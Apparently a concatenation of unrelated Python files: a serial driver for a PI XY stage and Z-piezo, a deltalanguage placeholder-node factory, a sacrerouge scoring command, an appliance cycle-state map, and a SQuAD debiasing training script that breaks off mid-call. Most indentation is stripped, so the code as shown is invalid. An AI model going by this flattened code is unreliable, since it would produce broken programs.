cmd_string = ['MOV ']
if x is not None:
self.x = float(x)
assert self.x_min <= self.x <= self.x_max
cmd_string.append('1 %0.9f '%self.x)
if y is not None:
self.y = float(y)
assert self.y_min <= self.y <= self.y_max
cmd_string.append('2 %0.9f '%self.y)
self.send(''.join(cmd_string), res=False)
self._moving = True
if blocking:
self.finish_moving()
return None
def finish_moving(self):
if not self._moving:
return None
if self.verbose: print("Finishing stage motion...")
while True:
self.port.write(b'\x05')
response = self.port.read(2)
if response == b'0\n':
break
self._moving = False
if self._joystick_enabled:
self.send('JON 3 1', res=False)
if self.verbose: print('Stage motion complete.\n')
self._check_errors()
return None
def get_position(self):
if self.verbose: print("Getting stage position...")
self.x, self.y = [float(a.split('=')[1]) for a in self.send('MOV? 1 2')]
if self.verbose: print(" Stage position:", self.x, self.y)
return self.x, self.y
def set_velocity(self, vx=None, vy=None):
assert vx is not None or vy is not None
if self.verbose: print("Setting stage velocity...")
cmd_string = ['VEL ']
if vx is not None:
vx = float(vx)
assert 0 < vx <= self.vx_max
self.vx = vx
cmd_string.append('1 %0.9f '%vx)
if vy is not None:
vy = float(vy)
assert 0 < vy <= self.vy_max
self.vy = vy
cmd_string.append('2 %0.9f '%vy)
self.send(''.join(cmd_string), res=False)
return None
def get_velocity(self):
if self.verbose: print("Getting stage velocity...")
self.vx, self.vy = [float(a.split('=')[1]) for a in self.send('VEL? 1 2')]
if self.verbose: print(" Stage velocity:", self.vx, self.vy)
return self.vx, self.vy
def set_acceleration(self, ax=None, ay=None, dx=None, dy=None):
assert ax is not None or ay is not None or dx is not None or dy is not None
if self.verbose: print("Setting stage acceleration...")
cmd_string = ['ACC ']
if ax is not None:
ax = float(ax)
assert 0 < ax <= self.ax_max
self.ax = ax
cmd_string.append('1 %0.9f '%ax)
if ay is not None:
ay = float(ay)
assert 0 < ay <= self.ay_max
self.ay = ay
cmd_string.append('2 %0.9f '%ay)
self.send(''.join(cmd_string), res=False)
cmd_string = ['DEC ']
if dx is not None:
dx = float(dx)
assert 0 < dx <= self.dx_max
self.dx = dx
cmd_string.append('1 %0.9f '%dx)
if dy is not None:
dy = float(dy)
assert 0 < dy <= self.dy_max
self.dy = dy
cmd_string.append('2 %0.9f '%dy)
self.send(''.join(cmd_string), res=False)
return None
def get_acceleration(self):
if self.verbose: print("Getting stage acceleration...")
self.ax, self.ay = [float(a.split('=')[1]) for a in self.send('ACC? 1 2')]
self.dx, self.dy = [float(a.split('=')[1]) for a in self.send('DEC? 1 2')]
if self.verbose: print(" Stage acceleration:", self.ax, self.ay)
if self.verbose: print(" Stage deceleration:", self.dx, self.dy)
return self.ax, self.ay, self.dx, self.dy
def enable_joystick(self, enabled=True):
if self.verbose: print("Joystick:", enabled)
if enabled == self._joystick_enabled:
return None
self.send(('JON 3 0', 'JON 3 1')[enabled], res=False)
self._joystick_enabled = enabled
return None
def _set_settling_time(self, tx=None, ty=None):
assert tx is not None or ty is not None
if self.verbose: print("Setting stage settling time...")
cmd_string = ['SPA ']
if tx is not None:
tx = float(tx)
assert 0 < tx <= 1 # You wanna wait longer? You crazy
cmd_string.append('1 0x3F %0.9f '%tx)
if ty is not None:
ty = float(ty)
assert 0 < ty <= 1
cmd_string.append('2 0x3F %0.9f '%ty)
self.send(''.join(cmd_string), res=False)
tx, ty = [float(a.split('=')[1]) for a in self.send('SPA? 1 0x3F 2 0x3F')]
return tx, ty
def _set_precision(self, dx=None, dy=None):
assert dx is not None or dy is not None
assert not self._moving
if self.verbose: print("Setting stage precision...")
# Our 'precision' parameters are bounded by other 'precision' parameters:
dx_max, dy_max = [float(a.split('=')[1])
for a in self.send('SPA? 1 0x416 2 0x416')]
cmd_string_1 = ['SPA ']
cmd_string_2 = ['SPA ']
if dx is not None:
dx = int(dx)
assert 1 < dx <= dx_max
cmd_string_1.append('1 0x407 %d '%dx)
cmd_string_2.append('1 0x406 %d '%(dx - 1))
if dy is not None:
dy = int(dy)
assert 1 < dy <= dy_max
cmd_string_1.append('2 0x407 %d '%dy)
cmd_string_2.append('2 0x406 %d '%(dy - 1))
# You have to turn off the servo and joystick to change precision:
if self.verbose: print(' ', end='', sep='')
self.enable_joystick(False)
self.send('SVO 1 0 2 0', res=False)
self.send(''.join(cmd_string_2), res=False)
self.send(''.join(cmd_string_1), res=False)
# Turn the servo back on, re-reference the stage, and turn the
# joystick back on:
self.send('SVO 1 1 2 1', res=False)
self.send('FRF', res=False)
while True: # Finish the reference move
self.port.write(b'\x05')
response = self.port.read(2)
if response == b'0\n':
break
if self.verbose: print(' ', end='', sep='')
self.enable_joystick(True)
dx, dy = [int(a.split('=')[1])
for a in self.send('SPA? 1 0x406 2 0x406')]
return dx, dy
def _set_startup_macro(self):
if self.verbose: print("Checking stage STARTUP macro...")
# Check if the STARTUP macro is set to run on startup:
if self.send('MAC DEF?')[0] == 'STARTUP':
# Check if the STARTUP macro is defined
if 'STARTUP' in self.send('MAC?'):
# Check if the STARTUP macro is what we expect:
old_verbose, self.verbose = self.verbose, False #Temp silence
startup_macro = self.send('MAC? STARTUP')
self.verbose = old_verbose
if startup_macro == [
'JON 1 0',
'SVO 1 1 2 1',
'FRF',
'WAC ONT? 1 = 1',
'WAC ONT? 2 = 1',
'JDT 3 1 2',
'JDT 3 2 2',
'JAX 3 1 1',
'JAX 3 2 2',
'JON 3 1',
'VEL 1 50 2 50']:
if self.verbose: print(' Found expected stage STARTUP macro')
return None
if self.verbose: print('Resetting STARTUP macro...')
# Check if there's a running macro:
if self.send('RMC?')[0] != '':
# ...which could be doing all kinds of crazy things; kill it
# by unsetting the startup macro and rebooting
self.send('MAC DEF', res=False)
self._reboot(finish_macro=False)
# Define our new startup macro:
self.send(
'MAC BEG STARTUP\n'
'JON 1 0\n'
'SVO 1 1 2 1\n'
'FRF\n'
'WAC ONT? 1 = 1\n'
'WAC ONT? 2 = 1\n'
'JDT 3 1 2\n'
'JDT 3 2 2\n'
'JAX 3 1 1\n'
'JAX 3 2 2\n'
'JON 3 1\n'
'VEL 1 50 2 50\n'
'MAC END',
res=False)
# Set it to run at startup, and reboot again.
self.send('MAC DEF STARTUP', res=False)
self._reboot()
# Wait for our startup macro to finish:
while self.send('RMC?')[0] == 'STARTUP': time.sleep(0.4)
return None
def _reboot(self, finish_macro=True):
if self.verbose: print('Rebooting stage', end='')
self.port.write(b'RBT\n')
time.sleep(0.2) #Give it time to reboot
self._check_errors()
if finish_macro:
self.verbose, old_verbose = False, self.verbose
while self.send('RMC?')[0] != '':
print('.', sep='', end='')
time.sleep(0.3)
self.verbose = old_verbose
if self.verbose: print('done')
return None
def _check_errors(self):
self.port.write(b'ERR?\n')
self.err = self.port.readline()
if not self.err == b'0\n':
raise RuntimeError("XY stage error code: "+self.err.decode("ascii"))
return None
def close(self):
self.port.close()
class E753_Z_Piezo:
def __init__(self, which_port, verbose=True):
try:
self.port = serial.Serial(
port=which_port, baudrate=115200, timeout=1)
except:
print("Failed to open serial port", which_port, "for PI Z-piezo.",
"Is it on, plugged in, and at the serial port you think?")
raise
self.verbose = False # Init quietly, get loud later.
if verbose: print('Initializing Z-piezo...', end='')
self.pos_min = float(self.send('TMN?')[0].split('=')[1])
self.pos_max = float(self.send('TMX?')[0].split('=')[1])
self.get_target_position()
self.get_real_position()
self.set_analog_control_state(False)
self.analog_offset = float( # We want this to be 50
self.send('SPA? 2 0x02000200')[0].split('=')[1])
self.analog_gain = float( # We want this to be 0.5
self.send('SPA? 2 0x02000300')[0].split('=')[1])
if (abs(self.analog_offset - 50.0) > 1e-5 or
abs(self.analog_gain - 0.5) > 1e-5):
self._set_offset_and_gain()
self._set_closed_loop_control_parameters(
p_term=.09, i_term=.000166, notch1_freq=480.0, notch2_freq=520.0,
notch1_rej=.050, notch2_rej=.050, slew_rate=2.5e6)
self.set_closed_loop()
self.verbose = verbose
if self.verbose:
print(".done!")
print(" Z-piezo limits: (", self.pos_min, ', ',
self.pos_max, ') microns', sep='')
print(" Z-piezo target:", self.target_pos, 'microns')
print(" Z-piezo actual:", self.real_pos, 'microns')
print(" Z-piezo analog control:", self.analog_control)
return None
def send(self, cmd, res=True):
if self.verbose: print(" Sending command to Z-piezo:", cmd)
# Allow cmd to be bytes or string
if type(cmd) is str: cmd = bytes(cmd, encoding='ascii')
assert type(cmd) is bytes
# Communicate:
self.port.write(cmd + b'\n')
responses = []
while res: # Do we expect a response?
response = self.port.readline()
if not response.endswith(b'\n'):
raise TimeoutError(
"No response from PI Z-piezo. Did you expect a response?"
"Is the device plugged in? Is it on?"
" Is it at the serial port you expect?")
if self.verbose: print(" Response from Z-piezo:", response)
responses.append(response.rstrip().decode('ascii'))
# Non-final responses have a trailing space:
if len(response) == 1: break #...but length-1 responses don't
if response[-2] != 32: break
# Cleanup:
assert self.port.in_waiting == 0
self._check_errors()
return responses
def _check_errors(self):
self.port.write(b'ERR?\n')
self.err = self.port.readline()
if not self.err == b'0\n':
raise PIError("Z-piezo error code: ", int(self.err))
return None
def get_real_position(self):
if self.verbose: print("Getting Z-piezo real position...")
self.real_pos = float(self.send('POS?')[0].split('=')[1])
if self.verbose: print(" Real Z-piezo position:", self.real_pos)
return self.real_pos
def get_target_position(self):
if self.verbose: print("Getting Z-piezo target position...")
self.target_pos = float(self.send('MOV?')[0].split('=')[1])
if self.verbose: print(" Z-piezo target position:", self.target_pos)
return self.target_pos
def move(self, target):
"""Move the piezo to an absolute position of 'target' microns."""
assert self.pos_min <= target <= self.pos_max
self.target_pos = float(target)
if self.verbose: print('Moving Z-piezo to: %0.3f' % self.target_pos)
if self.closed_loop:
self.send('MOV 1 %0.9f'%self.target_pos, res=False)
else:
self.send('SVA 1 %0.9f'%self.target_pos, res=False)
return None
def _finish_moving(self):
## This probably doesn't need to be used because the piezo is quick
assert self.closed_loop
if self.verbose: print("Finishing Z-piezo motion...")
while True:
self.port.write(b'\x05')
if self.port.read(2) == b'0\n': break
if self.verbose: print(' Z-piezo motion complete.')
self._check_errors()
return None
def _set_offset_and_gain(self, offset=50, gain=0.5):
# We need special permission to write these parameters
self.send('CCL 1 advanced', res=False)
self.send('SPA 2 0x02000200 %0.9f'%float(offset), res=False)
self.send('SPA 2 0x02000300 %0.9f'%float(gain), res=False)
if self.verbose:
print('Setting Z-piezo analog offset to %s'%offset)
print('Setting Z-piezo analog gain to %s'%gain)
# Return permissions to default
self.send('CCL 0', res=False)
self.analog_offset, self.analog_gain = offset, gain
return None
def set_closed_loop(self, closed_loop=True):
if self.verbose: print('Setting closed loop to:', closed_loop)
if closed_loop:
self.send('SVO 1 1', res=False)
else:
self.send('SVO 1 0', res=False)
self.closed_loop = (self.send('SVO? 1')[0].split('=')[1] == '1')
assert self.closed_loop == closed_loop
if (abs(self.analog_offset - 50.0) > 1e-5 or
abs(self.analog_gain - 0.5) > 1e-5):
self._set_offset_and_gain()
return None
def set_analog_control_state(self, analog_control=True):
if hasattr(self, 'analog_control'):
if analog_control == self.analog_control: return None
if self.verbose: print('Setting Z-piezo analog input:', analog_control)
self.analog_control = analog_control
# Requires special permission for writing these parameters
self.send('CCL 1 advanced', res=False)
if self.analog_control and not self.closed_loop:
# Change the analog offset so that the current input voltage
# will 'target' the current position
target = float(self.send('SVA?')[0].split('=')[1])
voltage = float(self.send('TSP? 2')[0].split('=')[1])
self.analog_offset = self.analog_offset + (target - voltage)
self.send('SPA 2 0x02000200 %0.9f'%self.analog_offset, res=False)
if self.analog_control:
self.send('SPA 1 0x06000500 2', res=False)
else:
self.send('WGO 1 0', res=False) # Make sure the wave generator's off
self.send('SPA 1 0x06000500 0', res=False)
# Return permissions to default
self.send('CCL 0', res=False)
return None
def record_analog_movement(self, record_types=(2,), t_resolution=1):
"""Prepares tecord the piezo's response to an analog voltage.
Note that you must trigger the piezo controller recording via a
TTL high signal on pin 5 of the controller's IO socket, in
addition to providing an analog control signal to the analog-in
socket.
args:
record_types -- List of ints that correspond to the appropriate
codes of record types. Use 'HDR?' command to
retrieve a list of possible codes.
t_resolution -- int between 1 and 10000. Corresponds to the
frequency at which a measurement is recorded. Units
are processor cycles (40 microseconds/cycle).
returns:
None
"""
assert 0 < len(record_types) <= 8 # We only have 8 datatables
assert ''.join([str(i) for i in record_types]).isdigit()
self.record_types = record_types
if self.verbose: print('Preparing Z piezo to record movement...')
self.set_analog_control_state(False) # Disable for setup
self.send('RTR %d'%t_resolution, res=False) # Set time resolution
# Set the number of tables
self.send('CCL 1 advanced', res=False) # Mother, may I?
self.send('SPA 1 0x16000300 %d'%len(self.record_types), res=False)
self.send('CCL 0', res=False) # Return command level to 0
# Set the record type for each table
for which_table, record in enumerate(self.record_types):
if self.verbose:
print(' Setting z-piezo to record value type',
'%d on table %d' % (record, which_table+1))
self.send('DRC %d 1 %d' % (which_table+1, record), res=False)
# Set up wave generator, just to trigger data recording.
# This won't affect piezo movement because we'll be in analog mode.
self.send('WSL 1 1', res=False) # attach a random wave from wave table
self.send('WGO 1 2', res=False) # set up wave to run on TTL to I/O port
self.set_analog_control_state(True) # return to analog control
if self.verbose: print('Done. Z-piezo is ready to record movement')
return None
def retrieve_data_log(self, rows, record_types=None, starting_row=1):
"""By default this reads the whole record, which can be sloooow.
You can use the arguments to only read portions of the record.
"""
verbose, self.verbose = self.verbose, False # Clam up, this is spammy
if verbose:
print('Retrieving data log from Z-piezo...', end='')
if rows > 1000: print(' (be patient)', end='')
if record_types is None:
tables = range(1, len(self.record_types) + 1)
else:
tables = [self.record_types.index(r) + 1 for r in record_types]
assert 0 < rows * len(self.record_types) < 2**16
cmd_string = 'DRR? %d %d %s'%(
starting_row, rows, ' '.join([str(i) for i in tables]))
data_log = self.send(cmd_string)
# Parsing of data_table
data = []
for i in data_log:
if not i.startswith("#"):
data.append([float(m) for m in i.split('\t')])
else:
if 'SAMPLE_TIME' in i: ## grab the time interval
time_step = float(i.split()[3])
position_um = np.asarray(data) # Microns (for most but not all outputs!)
time_s = time_step * np.arange(position_um.shape[0]) # Seconds
self.verbose = verbose
if self.verbose: print(' done!')
return position_um, time_s
def _set_closed_loop_control_parameters(
self,
p_term=None,
i_term=None,
notch1_freq=None,
notch2_freq=None,
notch1_rej=None,
notch2_rej=None,
slew_rate=None
):
"""Sets parameters affecting closed-loop control.
Be careful with these settings, as some combinations can
cause piezo to oscillate uncontrollably. Don't mess with this
unless you know what you're doing."""
##TODO check inputs
self.send('CCL 1 advanced', res=False) # Simon says
if p_term != None:
self.send('SPA 1 0x07000300 %f' % p_term, res=False)
if i_term != None:
self.send('SPA 1 0x07000301 %f' % i_term, res=False)
if notch1_freq != None:
self.send('SPA 1 0x08000100 %f' % notch1_freq, res=False)
if notch2_freq != None:
self.send('SPA 1 0x08000101 %f' % notch2_freq, res=False)
if notch1_rej != None:
self.send('SPA 1 0x08000200 %f' % notch1_rej, res=False)
if notch2_rej != None:
self.send('SPA 1 0x08000201 %f' % notch2_rej, res=False)
if slew_rate != None:
self.send('SPA 1 0x07000200 %f' % slew_rate, res=False)
self.send('CCL 0', res=False)
return None
def stop(self):
try:
self.send('STP', res=False)
except PIError as e:
if e.error_code != 10: raise
return None
def close(self):
if self.verbose: print('Z-piezo is shutting down!')
# Leave the piezo in closed-loop, non-analog control
self.set_analog_control_state(False)
self.set_closed_loop()
self.move(50)
if self.closed_loop: self._finish_moving()
self.stop()
self.port.close()
return None
class PIError(Exception):
def __init__(self, value, error_code):
self.value = value
self.error_code = error_code
def __str__(self):
return str(self.value) + str(self.error_code)
if __name__ == '__main__':
##
## RemoteRefocus test code
##
z_piezo = E753_Z_Piezo(which_port = 'COM6', verbose=True)
## A few move tests
z_piezo.move(10)
z_piezo._finish_moving()
z_piezo.get_real_position()
z_piezo.move(50)
z_piezo._finish_moving()
z_piezo.close()
##
# z_piezo.record_analog_movement(record_types=[1, 2],
# t_resolution=10)
    # z_piezo.retrieve_data_log(rows=300,
    #                           record_types=[1, 2])
##
## Stage test code
##
## stage = C867_XY_Stage(which_port='COM5', verbose=True)
## # Clean-ish slate for testing:
## stage._reboot()
## # Check how fast we can execute round-trip motions:
## num_motions = 20
## motion_size_x = 1
## motion_size_y = 1
## print("Testing speed...")
##
## # Test conditions for speed test 1:
## stage.enable_joystick(False)
## stage._set_settling_time(0.100, 0.100)
## stage._set_precision(10, 10)
## stage.set_velocity(120, 120)
## stage.verbose = False
## stage.move(0, 0)
##
## start = time.perf_counter()
## for i in range(num_motions):
## stage.move(0, 0)
## stage.move(motion_size_x, motion_size_y)
## end = time.perf_counter()
## print(end - start, 'seconds')
## # These conditions should give high-ish speed:
## stage.enable_joystick(False)
## stage._set_settling_time(0.001, 0.001)
## stage._set_precision(10, 10)
## stage.set_velocity(120, 120)
## stage.verbose = False
## stage.move(0, 0)
## # Check how fast we can execute round-trip motions:
## print("Testing speed...")
## start = time.perf_counter()
## for i in range(num_motions):
## stage.move(0, 0)
## stage.move(motion_size_x, motion_size_y)
## end = time.perf_counter()
## print(end - start, 'seconds')
##
## stage.close()
|
500319
|
from ._delta_graph import DeltaGraph
from ._node_classes.placeholder_node import PlaceholderNode
from ._node_classes.real_nodes import as_node
def placeholder_node_factory(*args, name=None, **kwargs) -> PlaceholderNode:
"""Node factory for for :py:class:`PlaceholderNode`.
The main use case of such nodes is allowing us to create cycles
in :py:class:`DeltaGraph` by allowing data dependencies to be resolved
out of the order. The need for this step
Parameters
----------
args
Nodes to create in-ports for if needed.
name
Name for the placeholder.
kwargs
Nodes to create in-ports for by kw if needed.
Returns
-------
PlaceholderNode
Constructed placeholder node.
Examples
--------
In this example we see a simple cycle of 2 nodes.
The placeholder is first used to provide an input to a new node, and then
it is specified by :py:meth:`PlaceholderNode.specify_by_node`:
.. code-block:: python
>>> import deltalanguage as dl
>>> @dl.DeltaBlock()
... def foo(a: int) -> int:
... if a%2 == 0:
... return a
... else:
... return -a
>>> @dl.Interactive([("a", int)], [('output',int)])
... def bar(node):
... internal_memory = 0
...
... for i in range(5):
... node.send(i)
... internal_memory += node.receive("a")
...
... print("0 - 1 + 2 - 3 + 4 =", internal_memory)
... raise dl.DeltaRuntimeExit
>>> with dl.DeltaGraph() as graph:
... p = dl.placeholder_node_factory()
... b = bar.call(a=p)
... p.specify_by_node(foo(b))
>>> rt = dl.DeltaPySimulator(graph)
>>> rt.run()
0 - 1 + 2 - 3 + 4 = 2
.. warning::
It is very important to design graphs in such a way that the exit
condition
:py:class:`DeltaRuntimeExit<deltalanguage.runtime.DeltaRuntimeExit>`
can always be reached.
For graphs with cyclic dependency of nodes it means that at least
one node should contain an internal state that would terminate the
cycle and redirect the flow of data in the graph.
Formally it means that the graph of nodes (which might be cyclic) has
a representation as a graph of states (which must be acyclic).
In the example above the state of the graph changes at each cycle,
with a clear termination condition, i.e. when ``for`` loop terminates.
    If nodes exhibit non-determinism, the designer of the graph
    might need to think about a backup exit plan, such as a timeout or a
    maximum number of iterations.
For instance, runtime simulators can be provided with the timeout
value, which will shut down the simulation regardless of the obtained
result, e.g. see
:py:meth:`DeltaPySimulator.run<deltalanguage.runtime.DeltaPySimulator.run>`.
    Users can also define placeholders with usual Python functions
    or class methods via :py:meth:`PlaceholderNode.specify_by_func` and
    :py:meth:`PlaceholderNode.specify_by_method` respectively.
.. TODO:: Add examples for both cases.
"""
# Get an appropriate name
if name is None:
name = DeltaGraph.get_next_placeholder_name()
# Get the active graph from the top of the graph stack
graph = DeltaGraph.current_graph()
# Check if arguments are nodes.
# If not, put them in PyConstBodies in the current graph
pos_input_nodes = [as_node(arg, graph) for arg in args]
kw_input_nodes = {name: as_node(arg, graph)
for (name, arg) in kwargs.items()}
# Use PlaceholderNode constructor and return result
return PlaceholderNode(graph, name, *pos_input_nodes, **kw_input_nodes)
|
500367
|
import argparse
import logging
from collections import defaultdict
from overrides import overrides
from typing import Dict, List
from sacrerouge.commands import RootSubcommand
from sacrerouge.common import Params
from sacrerouge.common.logging import prepare_global_logging
from sacrerouge.common.util import import_module_and_submodules
from sacrerouge.data import EvalInstance, Metrics
from sacrerouge.data.dataset_readers import DatasetReader
from sacrerouge.io import JsonlWriter
from sacrerouge.metrics import Metric
logger = logging.getLogger(__name__)
def add_score_arguments(parser: argparse.ArgumentParser, include_config_arguments: bool) -> None:
if include_config_arguments:
parser.add_argument(
'--config',
type=str,
help='The config file that specifies the dataset reader and metrics',
required=True
)
parser.add_argument(
'--overrides',
type=str,
help='A serialized json that will override the parameters passed in "config"'
)
parser.add_argument(
'--output-jsonl',
type=str,
help='The path to where the input-level metrics should be written',
required=True
)
parser.add_argument(
'--log-file',
type=str,
help='The file where the log should be written'
)
parser.add_argument(
'--silent',
action='store_true',
help='Controls whether the log should be written to stdout'
)
parser.add_argument(
'--include-packages',
nargs='+',
help='A list of additional packages to include'
)
parser.add_argument(
'--disable-peer-jackknifing',
action='store_true',
help='Disable running jackknifing for peer summaries'
)
def _load_metrics(params: Params) -> List[Metric]:
metrics = []
for metric_params in params.pop('metrics'):
metric = Metric.from_params(metric_params)
metrics.append(metric)
return metrics
def _score_with_metric(metric: Metric,
instances: List[EvalInstance],
metrics_dicts: Dict[str, Dict[str, Metrics]],
disable_peer_jackknifing: bool = False) -> None:
# The summaries need to be grouped based on identical context. For instance, we group all of the summaries
# that have the same reference documents together. This can sometimes make calculating the metric faster. The
# following variables assist doing this.
#
# Maintains a list of the unique contexts which group the summaries
fields_list = []
# A mapping from the context to its index in `fields_list`
field_to_index = {}
# A nested list that will be parallel to `fields_list`. The entry at index `i` is a list of instances which should
# be scored with `fields_list[i]`
instances_list = []
# A nested list that will be parallel to `instances_list` which contains the summary-specific fields
# for the corresponding instance
summary_fields_lists = []
# A nested list that will be parallel to `instances_list` which marks if the calculation for that (summary, context)
# pair represents jackknifing or not
jackknifing_flags = []
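    #
    # Illustrative sketch (hypothetical example, not from the original code): if instances
    # A and B share reference context R1 while instance C uses R2, then after the loop below
    # fields_list == [R1, R2], instances_list == [[A, B], [C]], and summary_fields_lists and
    # jackknifing_flags mirror that nesting, so each unique context is scored once per group.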
for instance in instances:
# Select just the relevant fields for this metric
summary_fields = instance.fields.select_fields(metric.required_summary_fields)
context_fields = instance.fields.select_fields(metric.required_context_fields)
        # Score the instance normally using all of the fields. If the metric
        # requires jackknifing and this is a reference summary, the normal score
        # is already comparable to the jackknifed peer scores.
is_jackknifing = metric.requires_jackknifing() and instance.summarizer_type == 'reference'
if context_fields not in field_to_index:
field_to_index[context_fields] = len(field_to_index)
fields_list.append(context_fields)
instances_list.append([])
summary_fields_lists.append([])
jackknifing_flags.append([])
index = field_to_index[context_fields]
instances_list[index].append(instance)
summary_fields_lists[index].append(summary_fields)
jackknifing_flags[index].append(is_jackknifing)
# Potentially run jackknifing for the peers
if not disable_peer_jackknifing and metric.requires_jackknifing() and instance.summarizer_type == 'peer':
jk_fields_list = metric.jackknifer.get_jackknifing_fields_list(context_fields)
if jk_fields_list:
for jk_fields in jk_fields_list:
if jk_fields not in field_to_index:
field_to_index[jk_fields] = len(field_to_index)
fields_list.append(jk_fields)
instances_list.append([])
summary_fields_lists.append([])
jackknifing_flags.append([])
index = field_to_index[jk_fields]
instances_list[index].append(instance)
summary_fields_lists[index].append(summary_fields)
jackknifing_flags[index].append(True)
# Construct the arguments that will be passed to the scoring method
summary_args = []
for name in metric.required_summary_fields:
summary_args.append([[summary_fields[name].to_input() for summary_fields in summary_fields_list] for summary_fields_list in summary_fields_lists])
context_args = []
for name in metric.required_context_fields:
context_args.append([fields[name].to_input() for fields in fields_list])
# Score the summaries
results_lists = metric.score_multi_all(*summary_args, *context_args)
# Used to aggregate the jk results
jk_results = defaultdict(lambda: defaultdict(list))
for i, results_list in enumerate(results_lists):
for j, results in enumerate(results_list):
instance = instances_list[i][j]
is_jackknifing = jackknifing_flags[i][j]
if is_jackknifing:
jk_results[instance.instance_id][instance.summarizer_id].append(results)
else:
metrics_dicts[instance.instance_id][instance.summarizer_id].metrics.update(results)
# Aggregate the jk results
for instance_id in jk_results.keys():
for summarizer_id, results in jk_results[instance_id].items():
result = sum(results) / len(results)
for name, value in result.items():
metrics_dicts[instance_id][summarizer_id].metrics[name + '_jk'] = value
def _get_initial_metrics_dicts(instances: List[EvalInstance]) -> Dict[str, Dict[str, Metrics]]:
metrics_dicts = defaultdict(dict)
for instance in instances:
metrics = Metrics(instance.instance_id, instance.summarizer_id, instance.summarizer_type)
metrics_dicts[instance.instance_id][instance.summarizer_id] = metrics
return metrics_dicts
def score_instances(instances: List[EvalInstance],
metrics: List[Metric],
disable_peer_jackknifing: bool = False) -> Dict[str, Dict[str, Metrics]]:
metrics_dicts = _get_initial_metrics_dicts(instances)
for metric in metrics:
_score_with_metric(metric, instances, metrics_dicts, disable_peer_jackknifing=disable_peer_jackknifing)
return metrics_dicts
def save_score_results(metrics_dicts: Dict[str, Dict[str, Metrics]], output_file: str, silent: bool) -> None:
with JsonlWriter(output_file) as out:
for instance_id in sorted(metrics_dicts.keys()):
for summarizer_id in sorted(metrics_dicts[instance_id].keys()):
out.write(metrics_dicts[instance_id][summarizer_id])
@RootSubcommand.register('score')
class ScoreSubcommand(RootSubcommand):
@overrides
def add_subparser(self, parser: argparse._SubParsersAction):
description = 'Score all of the inputs to evaluate a metric'
self.parser = parser.add_parser('score', description=description, help=description)
add_score_arguments(self.parser, True)
self.parser.set_defaults(func=self.run)
@overrides
def run(self, args):
prepare_global_logging(file_path=args.log_file, silent=args.silent)
import_module_and_submodules('sacrerouge')
include_packages = args.include_packages or []
for package in include_packages:
import_module_and_submodules(package)
params = Params.from_file(args.config, args.overrides)
dataset_reader = DatasetReader.from_params(params.pop('dataset_reader'))
metrics = _load_metrics(params)
input_files = params.pop('input_files')
if isinstance(input_files, str):
input_files = [input_files]
instances = dataset_reader.read(*input_files)
metrics_dicts = score_instances(instances, metrics, args.disable_peer_jackknifing)
save_score_results(metrics_dicts, args.output_jsonl, args.silent)
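# Hypothetical config sketch (inferred from the code above, which pops 'dataset_reader',
# 'metrics', and 'input_files' from the loaded Params; the concrete type names are
# placeholders, not real registered names):
#
# {
#     "dataset_reader": {"type": "<reader-name>"},
#     "metrics": [{"type": "<metric-name>"}],
#     "input_files": ["<path-to-instances.jsonl>"]
# }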
|
500394
|
from .erd_cycle_state import ErdCycleState, ErdCycleStateRaw
CYCLE_STATE_RAW_MAP = {
ErdCycleStateRaw.PREWASH: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.PREWASH1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START2: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START3: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.END_PREWASH1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.SENSING: ErdCycleState.SENSING,
ErdCycleStateRaw.MAIN_WASH: ErdCycleState.MAIN_WASH,
ErdCycleStateRaw.DIVERTER_CAL: ErdCycleState.MAIN_WASH,
ErdCycleStateRaw.DRYING: ErdCycleState.DRYING,
ErdCycleStateRaw.SANITIZING: ErdCycleState.SANITIZING,
ErdCycleStateRaw.RINSING: ErdCycleState.RINSING,
ErdCycleStateRaw.TURNIDITY_CAL: ErdCycleState.RINSING,
ErdCycleStateRaw.FINAL_RINSE: ErdCycleState.RINSING,
ErdCycleStateRaw.FINAL_RINSE_FILL: ErdCycleState.RINSING,
ErdCycleStateRaw.PAUSE: ErdCycleState.PAUSE,
ErdCycleStateRaw.STATE_17: ErdCycleState.NA,
ErdCycleStateRaw.STATE_18: ErdCycleState.NA,
ErdCycleStateRaw.CYCLE_INACTIVE: ErdCycleState.NA,
ErdCycleStateRaw.MAX: ErdCycleState.NA,
ErdCycleStateRaw.INVALID: ErdCycleState.NA
}
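# Hypothetical helper (a minimal sketch, not part of the original module): applies the
# mapping above, falling back to ErdCycleState.NA for any raw state missing from the table.
def simplify_cycle_state(raw_state: ErdCycleStateRaw) -> ErdCycleState:
    return CYCLE_STATE_RAW_MAP.get(raw_state, ErdCycleState.NA)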
|
500400
|
import argparse
import logging
# Need to import these here for pickle
from debias.datasets.dataset_utils import QuantileBatcher
from debias.datasets.squad import AnnotatedSquadLoader
from debias.experiments.eval_debiased_squad import compute_all_scores
from debias.models.text_pair_qa_model import TextPairQaDebiasingModel
from debias.modules.attention_layers import WeightedDot, BiAttention
from debias.modules.cudnn_recurrent_dropout import CudnnLSTMRecurrentDropout
from debias.modules.layers import VariationalDropout, seq, FullyConnected, MaxPooler, Conv1d
from debias.modules.word_and_char_encoder import WordAndCharEncoder
from debias.training.evaluator import Evaluator
from debias.training.trainer import Trainer, AdamOptimizer
from debias.utils import py_utils, cli_utils
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--stratify", type=int, default=None)
parser.add_argument("--bias", choices=["tfidf", "tfidf_filtered"], default="tfidf_filtered")
cli_utils.add_general_args(parser)
cli_utils.add_loss_args(parser, default_penalty=2.0)
args = parser.parse_args()
if args.stratify is None:
if args.mode == "learned_mixin":
            # Not sure if this actually makes a difference, but I turned this on
            # for the learned_mixin case, so we do the same here for exactness
args.stratify = 6
dbg = args.debug
if dbg:
epoch_size = 50
else:
epoch_size = 1341
opt = AdamOptimizer(max_grad_norm=5.0)
batcher = QuantileBatcher(45, 10, 300, 4, 12)
evaluator = Evaluator("squad")
trainer = Trainer(
batcher, opt, evaluator,
eval_batch_size=90,
num_epochs=30, epoch_size=epoch_size,
log_period=100,
prefetch=5, loss_ema=0.999,
n_processes=args.n_processes
)
filtered_bias = args.bias == "tfidf_filtered"
if dbg:
dataset = AnnotatedSquadLoader(
sample_train=1000, sample_dev=500, stratify=args.stratify, filtered_bias=filtered_bias)
else:
dataset = AnnotatedSquadLoader(
